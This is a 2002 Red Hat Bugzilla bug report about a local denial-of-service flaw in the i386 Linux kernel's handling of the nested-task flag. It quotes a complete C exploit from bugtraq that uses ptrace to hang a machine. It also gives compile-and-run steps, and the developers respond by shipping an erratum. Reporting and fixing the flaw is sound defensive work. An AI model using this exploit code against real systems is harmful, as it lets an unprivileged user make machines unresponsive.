Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 77834 - Working Dos from bugtraq mailing list
Summary: Working Dos from bugtraq mailing list
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: kernel
Version: 8.0
Hardware: i686
OS: Linux
high
medium
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2002-11-14 07:42 UTC by Leonid Mamtchenkov
Modified: 2007-03-27 03:58 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2002-11-16 11:06:56 UTC


Attachments (Terms of Use)


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2002:262 normal SHIPPED_LIVE : New kernel fixes local denial of service issue 2002-09-23 04:00:00 UTC
Red Hat Product Errata RHSA-2002:263 normal SHIPPED_LIVE Important: kernel security update 2002-09-23 04:00:00 UTC

Description Leonid Mamtchenkov 2002-11-14 07:42:49 UTC
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
"
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS


On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

--
Christophe Devine
"

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):
kernel-2.4.18-17.8.0


How Reproducible:
Always

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:

Comment 1 Arjan van de Ven 2002-11-14 09:07:28 UTC
yes we know about this; I built packages yesterday and they're in QA now

Comment 2 Arjan van de Ven 2002-11-16 11:06:56 UTC
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2002-262.html


Comment 3 Frederic Hermann 2002-11-18 10:44:15 UTC
This bug affect RedHat Linux 6.2 as well. I ran the program above on an up-to-
date RH6.2 box, as an unprivilegied user, and the box totally hang.


Note You need to log in before you can comment on or make changes to this bug.